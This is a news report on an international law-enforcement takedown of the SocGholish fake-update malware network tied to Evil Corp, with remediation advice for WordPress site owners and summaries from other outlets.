Operation Endgame Disrupts SocGholish Malware Network Used by Evil Corp Ransomware Gang
International law enforcement has disrupted the SocGholish malware network, removing malicious code from 15,000 compromised websites and dismantling infrastructure linked to the Evil Corp ransomware group.
A major cybercriminal network involving thousands of infected websites used to distribute malware has been disrupted by an international law enforcement takedown. The action against the SocGholish malware group formed the latest part of Operation Endgame, an ongoing global police investigation to combat ransomware and cybercrime worldwide.
Announced by the Dutch police on June 18, action was taken to remediate infections of 15,000 websites controlled by the SocGholish group and to dismantle the botnet associated with the group. Notably, the SocGholish botnet was regularly used by Evil Corp, the notorious Russia-based ransomware and cybercrime group behind a swath of destructive malware attacks worldwide, including against governments, healthcare institutions, and enterprises.
SocGholish hacked or used previously leaked credentials to gain access to legitimate WordPress sites. As detailed by Proofpoint, which tracks SocGholish as TA569, these compromised websites were used to push malicious pop-ups to visitors, telling users that they were using out-of-date software that needed updating. If the user installed the 'update,' they became infected with malware and roped into the SocGholish botnet, used to deliver malware and ransomware to further victims.
The international law enforcement action against SocGholish has seen the takedown of 106 servers and domains associated with the malware, as well as remediating infections of the compromised websites. "With these actions we deprive cybercriminals of access to infected computer systems. This prevents further damage to the digital systems of citizens, businesses and organizations worldwide and limits the spread of malware," said Maikel Rollman of the Netherlands National High Tech Crime Unit (NHCTU). "It also reduces the risk that these systems are used for cyber‑attacks on critical infrastructure and other essential societal processes. This marks the beginning of further action against SocGholish," he added.
The coordinated action took place over a week and was taken jointly by specialist agents and officers at the NHCTU, the Royal Canadian Mounted Police (RCMP), the German Federal Criminal Police Office (BKA), and the US Federal Bureau of Investigation (FBI). The action also received support from Europol, Eurojust, and cybersecurity industry partners. "SocGholish is not a niche threat. Their activities reach deep into public sector and commercial environments, paving the way for other cybercriminals to gain access to networks," said Dr. Renée Burton, vice president of Infoblox Threat Intel, one of the industry partners supporting the action.
The owners of the compromised websites have been informed about what happened and urged to change their login credentials, as well as update the sites with the necessary security patches. The owners of WordPress sites have also been issued with advice to change their login credentials, enable multi‑factor authentication, delete any unknown additional WordPress accounts, and keep their WordPress site up‑to‑date in the future.
This takedown represents a significant blow to Evil Corp's malware distribution pipeline, which relied on SocGholish to gain initial access to victim networks before deploying ransomware. Operation Endgame continues to demonstrate the effectiveness of international law enforcement collaboration in disrupting the infrastructure that enables ransomware operations at scale.
The SentinelOne roundup adds the detail that the SocGholish cleanup was part of Operation Endgame and was coordinated with Europol and Eurojust. It also reports that authorities urged affected site administrators to enable multi-factor authentication and keep platform software updated, framing the action as the beginning of sustained enforcement against the botnet. Separately, the article notes the FBI-led dismantling of the Chinese PhaaS operation Outsider Enterprise, which caused an estimated $1.9 billion in losses and the theft of 3.8 million credit card records, alongside the takedown of over 100 Evil Corp command servers.
The Record reports that the operation, which targeted the SocGholish botnet (also known as FakeUpdates), involved coordinated actions across multiple countries to dismantle the infrastructure enabling Evil Corp's ransomware and data theft campaigns. This international law enforcement effort specifically focused on the malware delivery network that has been used for years via compromised websites.